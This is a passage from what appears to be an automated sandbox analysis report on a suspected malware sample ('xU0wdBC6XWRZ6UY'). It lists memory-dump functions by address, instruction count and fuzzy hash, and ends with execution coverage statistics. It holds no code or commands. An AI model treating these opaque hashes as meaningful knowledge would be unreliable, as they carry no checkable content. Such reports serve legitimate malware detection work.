                                                          • Opcode ID: 98ca488f11e29b859d6b44e36b99cc42871746d70264ca759fd9d27e749270bd
                                                          • Instruction ID: 423affdef65757fb104c0c39c8cd2d850f614db73215593eb15cdaf9ccd43314
                                                          • Opcode Fuzzy Hash: 98ca488f11e29b859d6b44e36b99cc42871746d70264ca759fd9d27e749270bd
                                                          • Instruction Fuzzy Hash: D5E0ECB485E344DFCF818FA2C00C5ACBBBCAF4B301F01A09AD41A9B222C278A844CB04
                                                          Function 07C94A47 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 06984395b3f06f53992e2acece66f75d4e25abdebb26919d5d95e64c3dcc61c3
                                                          • Instruction ID: 8f58afdc06de16f97b6570f81e9e0cc12e033f3dcd21f5a246f8d058c445dcf3
                                                          • Opcode Fuzzy Hash: 06984395b3f06f53992e2acece66f75d4e25abdebb26919d5d95e64c3dcc61c3
                                                          • Instruction Fuzzy Hash: C0E0C27410E3806FC345EB10895085BBB75EBC5304F088C9FE49047252CA21CE16CB62
                                                          Function 07C996EA Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                                                          • Instruction ID: c7726d7a5d0c8c6cb068aa56627743d22783841e1d6423ce688cbd81f0c5cdb5
                                                          • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                                                          • Instruction Fuzzy Hash: 70D067B895E208DFCF85CB53C44C9EDBB7CBB9B300F00A569942A9B212D675B544CE40
                                                          Function 07C94763 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fa905c4e84fa58116416977e15dc6ea25d2fb0b3ecd7dd6d976c121150776e7
                                                          • Instruction ID: 1e6f7e688fb8b9239dd9068def305990f803a6c90d16d9a0a7e65638573eeeb8
                                                          • Opcode Fuzzy Hash: 3fa905c4e84fa58116416977e15dc6ea25d2fb0b3ecd7dd6d976c121150776e7
                                                          • Instruction Fuzzy Hash: 37D02EB042A2804EC382EA24C84146ABB31AF93200B08C5ABE0808B212DB21CB1AC361
                                                          Function 07C9D330 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2f340931027270695021af1cf522bb2365c12ca29b44906bfb18533ff752b41
                                                          • Instruction ID: 4e86da14431ed4f657a4e01aa1a9baf21eef210a76d91f6e9cedc5fc57e6c9dd
                                                          • Opcode Fuzzy Hash: f2f340931027270695021af1cf522bb2365c12ca29b44906bfb18533ff752b41
                                                          • Instruction Fuzzy Hash: 62E0E2B4A086688FCB90DF58D8807AEBBF5BB1A310F5091D5E04EE7301E7309984CF41
                                                          Function 07C95630 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb167fa513d1eb487d5bee33762e0dc2c997ef94a2010d081dc5671d8dd23370
                                                          • Instruction ID: def1c35d6a7af22db6178d963c07743b98c5ee2727cb26d52fc3c29694650953
                                                          • Opcode Fuzzy Hash: bb167fa513d1eb487d5bee33762e0dc2c997ef94a2010d081dc5671d8dd23370
                                                          • Instruction Fuzzy Hash: 3BD0C97130D3504FD34AC638DC231547BF19A8A11032D80AB9448CB393EA26ED039785
                                                          Function 07C934B8 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12a800be11c6dde94ab85bea46f57c2be36fd8cfaec274906b12f0ec5fdbe2fa
                                                          • Instruction ID: 2a259ec2f8cc785d053a54c9cb52e0b512416f11d5b1ca57bd28325507e36364
                                                          • Opcode Fuzzy Hash: 12a800be11c6dde94ab85bea46f57c2be36fd8cfaec274906b12f0ec5fdbe2fa
                                                          • Instruction Fuzzy Hash: 80D0A771C0420CEF8F01CFA1D80149DBBF9EB49101B1049F5D50AC7200FE314A005BD2
                                                          Function 07C9C268 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91d697ac937df4cbf954753651b84bd7f50e1eae619233866a198a07a5b5e451
                                                          • Instruction ID: 3df87354bc3f9510546e0d3678d681a63a1fbfacb0075c1d49b30fc70b86e78f
                                                          • Opcode Fuzzy Hash: 91d697ac937df4cbf954753651b84bd7f50e1eae619233866a198a07a5b5e451
                                                          • Instruction Fuzzy Hash: 90D0C9B1D0520CFF8F50DFF1890059EBBE9DB4A180B2045F6D90AD7210EA319F1467E2
                                                          Function 07C9A8B8 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 140febf9350beee60371dc989be406f0aac169dbe00b80ecd5d250aa44afe02a
                                                          • Instruction ID: 672d40c074e5e708e83bba3b3262b2ba16d2f3f4429590f90c4d034474821cc1
                                                          • Opcode Fuzzy Hash: 140febf9350beee60371dc989be406f0aac169dbe00b80ecd5d250aa44afe02a
                                                          • Instruction Fuzzy Hash: CDD05EF46082805FEB82D614CC90815BFA1AB91254704C4DDE488CF266D7669D03C715
                                                          Function 07C9864F Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 962e857514935a42d838609b9cdf9a7dd23115a2568bfd772688ab7bb3e60b82
                                                          • Instruction ID: addb64803038b2417e34a0e8feac0b963615c0b1ebc4465787db192c3be5d716
                                                          • Opcode Fuzzy Hash: 962e857514935a42d838609b9cdf9a7dd23115a2568bfd772688ab7bb3e60b82
                                                          • Instruction Fuzzy Hash: 8DD0C975208111AF9204CE44E941C6BB7EAEBC8A10B14884EB84053310CA62DC16CBB2
                                                          Function 07C9D742 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c447925631b9eae7b2727efd79039bccfe3aa145f3bb3bee9ed2f9d61dda1806
                                                          • Instruction ID: 8ce6853d81c5efcd78efbed57376a6551c710481c5d89f4ae5f2fd1bd158fd87
                                                          • Opcode Fuzzy Hash: c447925631b9eae7b2727efd79039bccfe3aa145f3bb3bee9ed2f9d61dda1806
                                                          • Instruction Fuzzy Hash: 61C080B05095405EC7C3C325D4514407F51DE95204314D1DED448C7717CB2748038751
                                                          Function 07C9C341 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac9eecf8def0e25752e66f98174dcf856230493cf55e1090a6a42906f5b07fd5
                                                          • Instruction ID: 2ab52a8706730760f10e47dabae9dcd5574e4611a9eca747f498e19d9e2c8651
                                                          • Opcode Fuzzy Hash: ac9eecf8def0e25752e66f98174dcf856230493cf55e1090a6a42906f5b07fd5
                                                          • Instruction Fuzzy Hash: 0FC08CE640AB8094AEE362208C80516BF506F22310350C093D2881412293168610922F
                                                          Function 07C9F3E0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 142ead24b288e9743578897ff7454ed3415a89420e85f06cff48ff1ab075bdf3
                                                          • Instruction ID: a31f8a4e2d7c983e0ba9289523876dcfb99a5dbb0e453947a5bedba22f56edeb
                                                          • Opcode Fuzzy Hash: 142ead24b288e9743578897ff7454ed3415a89420e85f06cff48ff1ab075bdf3
                                                          • Instruction Fuzzy Hash: 17C04C71040648D7E7146799B44E36877A8A705316F540025A54D854718BBD69E4C65A
                                                          Function 07C94D10 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04ae9cef57e881139de820eefc8afc4d46c5aaa865a7939946c75dfed97baa61
                                                          • Instruction ID: 698dfbf7ba5849eb0ae4661240ab9fe7d1a6449340bb8819c9d44fdfaadc040e
                                                          • Opcode Fuzzy Hash: 04ae9cef57e881139de820eefc8afc4d46c5aaa865a7939946c75dfed97baa61
                                                          • Instruction Fuzzy Hash: 13C08C3A010100AB8A81A740C54881ABBA0BF51300B00C822A10105020CB208528AB03
                                                          Function 07C9909F Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a403ecc4727d9601111b0649a38dec8a64ae8a397223b5a9fb2cb5b06a59daf
                                                          • Instruction ID: 4129cb70ba6f02199f3494dc2108c17a2581001f00d4ce476b878b0477c5b5a0
                                                          • Opcode Fuzzy Hash: 1a403ecc4727d9601111b0649a38dec8a64ae8a397223b5a9fb2cb5b06a59daf
                                                          • Instruction Fuzzy Hash: 63C002B091C258CFDFA18F72D4584AC7B75BB8F242F20646E917797262C6312904CF11
                                                          Function 07C9ADF0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 761fbdf672946135de0330aa1d5b6c7179b99768fcea53478c189d6bf90d85e1
                                                          • Instruction ID: 76325dd8b1c9a007edbfd9d4d2865449837262efcc45f2c804dc0dda69c24e07
                                                          • Opcode Fuzzy Hash: 761fbdf672946135de0330aa1d5b6c7179b99768fcea53478c189d6bf90d85e1
                                                          • Instruction Fuzzy Hash: 52B092B61A4640A268A062A08888B2A5A00ABA2700B808C22220910010C621842AA22B
                                                          Function 07C953AB Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c2636a16617edabde6238199beaf0e80e6325288f0f6b7ac3262dbbacbe9c62
                                                          • Instruction ID: e7f20d3a93a537af639d957f8f8e8631d7461f5ee3543763315be8ab1ccf706c
                                                          • Opcode Fuzzy Hash: 2c2636a16617edabde6238199beaf0e80e6325288f0f6b7ac3262dbbacbe9c62
                                                          • Instruction Fuzzy Hash: ABB012B0A030005B8A42D644E941864B328EB84108334CC9CA8068B3ABEF33ED038AC0
                                                          Function 07C9902E Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cbede454f044fd277a3e1e24a8ac25c1885af48c552171b173d3b65e1aff831
                                                          • Instruction ID: 797b96c1afd2676b23a95a1a8e602d8b2f07da0b4f9723b33ef2586624004f4d
                                                          • Opcode Fuzzy Hash: 4cbede454f044fd277a3e1e24a8ac25c1885af48c552171b173d3b65e1aff831
                                                          • Instruction Fuzzy Hash: 56C04C70D18108CFCB608F72D4484AC7775BB4E242F20542D903793112C6302404CF00
                                                          Function 07C9AABF Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 553a3e1533a33970b463ace2064912813403635a2b71184cb570dab477052a2f
                                                          • Instruction ID: ca5bf82675ffd51f826a4239900273f3444c5563ec5a39683690f4fd795b3e15
                                                          • Opcode Fuzzy Hash: 553a3e1533a33970b463ace2064912813403635a2b71184cb570dab477052a2f
                                                          • Instruction Fuzzy Hash: 48B0923A001048AE8A82AB40C904C4ABBA5BB54A007408061A2440A0308621C529AB52
                                                          Function 07C98780 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                          • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                          • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                          • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

                                                          Non-executed Functions

                                                          Function 07CF3433 Relevance: .3, Instructions: 328COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 894be7c1b4576e221d403eed206ee8c8a9656b324c3e63300fe3a66750a4dc62
                                                          • Instruction ID: 99f83943c6df5a290c3ae1bde1b28e6867bfb915b02a511721b09cdd355deda0
                                                          • Opcode Fuzzy Hash: 894be7c1b4576e221d403eed206ee8c8a9656b324c3e63300fe3a66750a4dc62
                                                          • Instruction Fuzzy Hash: 2BE13AB4E002598FDB54DFA9C580AAEFBB2FF89304F24816AD514AB355D734AD41CF60
                                                          Function 07CF5D70 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72b584926b423e09ecdf1aebcbbc7bb8ed3220205b0caa544a3c55356315bbe0
                                                          • Instruction ID: 9a8aaa29a0d8603f94b7830e12a120325a8426e92049a9051ccca34c9aad7a69
                                                          • Opcode Fuzzy Hash: 72b584926b423e09ecdf1aebcbbc7bb8ed3220205b0caa544a3c55356315bbe0
                                                          • Instruction Fuzzy Hash: D8E1F7B4E002198FDB54DFA9C580AAEFBB6FF89304F248169D514AB356D734AD42CF60
                                                          Function 07CF3CC0 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30adead752c9a2107b3a7bcc4f81fd601d32c7cf8fbd093f58dee48817ad1662
                                                          • Instruction ID: ad64f84c34bd3bcfb195865731a71febe7f30a6d9f339f2ba024c9e26b7560b4
                                                          • Opcode Fuzzy Hash: 30adead752c9a2107b3a7bcc4f81fd601d32c7cf8fbd093f58dee48817ad1662
                                                          • Instruction Fuzzy Hash: 11E127B4E002598FDB54DFA9C580AAEFBB6FF89304F248169D514AB356C731AD42CF60
                                                          Function 07CF5368 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4fffd1bf0b3cbf888f115918e35740f41b910b832d8d6b2ea589f9557e802ae
                                                          • Instruction ID: 832556dbe1dc3654ed92c7b52f6dcb06316f959a1a2d0787f7275e99c135f39b
                                                          • Opcode Fuzzy Hash: a4fffd1bf0b3cbf888f115918e35740f41b910b832d8d6b2ea589f9557e802ae
                                                          • Instruction Fuzzy Hash: 50E117B4E002198FDB54DFA9D580AAEFBB6FF89304F248169D614AB355D730AD42CF60
                                                          Function 07CF3888 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62219a8733a59431e58df0cad4d5f8984394412d3884a4b266781a72697da74a
                                                          • Instruction ID: b5fb2b6de7ea4c18f4543c020ad4b6bfd16b427c41c49ca75e569a986d00a349
                                                          • Opcode Fuzzy Hash: 62219a8733a59431e58df0cad4d5f8984394412d3884a4b266781a72697da74a
                                                          • Instruction Fuzzy Hash: 9AE138B4E002599FDB54DFA9C580AAEFBB2FF89304F248169D904AB355D730AD41CFA0
                                                          Function 07C9BB57 Relevance: .3, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb1eedf0c70507ad3e23886167ec27bae9697f24a4a3eca62bc1cceee67911cd
                                                          • Instruction ID: 90fcd652bdf2b18a8ada36a801c4f2a6a548890201fec24feab0bd6d371f60d5
                                                          • Opcode Fuzzy Hash: eb1eedf0c70507ad3e23886167ec27bae9697f24a4a3eca62bc1cceee67911cd
                                                          • Instruction Fuzzy Hash: 4AD12634C2071ACACB20EB64D8506E9B7B1FF99300F50D79AD5497B260EB706AC9CF91
                                                          Function 07C9BB58 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a681e78ee4a7c66af5987e111140774756eb8c8a80e1c81de6cb0f13515012b
                                                          • Instruction ID: c940775797abc9fcf07097d15a5265425e26a2d03a3aadcc8d82546e86465ec4
                                                          • Opcode Fuzzy Hash: 5a681e78ee4a7c66af5987e111140774756eb8c8a80e1c81de6cb0f13515012b
                                                          • Instruction Fuzzy Hash: 52D12634C2071ACACB20EB64D8506E9B7B1FF99300F50D79AD5497B260EB706AC9CF91
                                                          Function 018FDA74 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f5557a8db154cf87d18a1aba6b4c98708d06bc770b3c0688f4d0ef82bbf2563
                                                          • Instruction ID: 46d58db017f35f2607f932311829b6d8a399402749481820b8e70885d26d970f
                                                          • Opcode Fuzzy Hash: 0f5557a8db154cf87d18a1aba6b4c98708d06bc770b3c0688f4d0ef82bbf2563
                                                          • Instruction Fuzzy Hash: 9FA14F32E0021A8FCF15DFB8C84459EBBB2FF85300B15856EEA05EB265DB35EA55CB50
                                                          Function 07C934E1 Relevance: .2, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 606435ae367ed5ea063e8e697781bca28e906e26a21655e36ec72757a98e8774
                                                          • Instruction ID: d8d06b579be0501322495f52d9ae3f63b802dfef1f8005d5a24b28da8f9f04c0
                                                          • Opcode Fuzzy Hash: 606435ae367ed5ea063e8e697781bca28e906e26a21655e36ec72757a98e8774
                                                          • Instruction Fuzzy Hash: 04518F74E012168FD798EF7BE8006AE7BE7FBC8300F04D529D1059F2A8EB3559069B52
                                                          Function 07C934F0 Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fba303177be43a1352fc0b74a1b6b0e4a7d48c418a87e16f5215396396e592a2
                                                          • Instruction ID: 9bafc1b1d688d38142241b6a3e24eb64aeb5e84301ad1c56432ad50b14ae6f3c
                                                          • Opcode Fuzzy Hash: fba303177be43a1352fc0b74a1b6b0e4a7d48c418a87e16f5215396396e592a2
                                                          • Instruction Fuzzy Hash: FD516D74E016168FE758EF7BE8006AE7BE7FBC8301F04D429D1059F2A8EB7558069B52
                                                          Function 07CF3CB0 Relevance: .1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bfab2a716cca59a82f137dbdbc111be962d9e9a25dd83abe6ee2234149f6f01
                                                          • Instruction ID: d9dba2848194d1b8ee6883a6354583201310c1534ff3f409eff0ef8cabe33a12
                                                          • Opcode Fuzzy Hash: 7bfab2a716cca59a82f137dbdbc111be962d9e9a25dd83abe6ee2234149f6f01
                                                          • Instruction Fuzzy Hash: CA512AB4E002598FDB54CFA9C5805AEFBB6FF89304F24816AD518AB356D7309E42CF61

                                                          Execution Graph

                                                          Execution Coverage:1.3%
                                                          Dynamic/Decrypted Code Coverage:2.7%
                                                          Signature Coverage:5.9%
                                                          Total number of Nodes:546
                                                          Total number of Limit Nodes:67
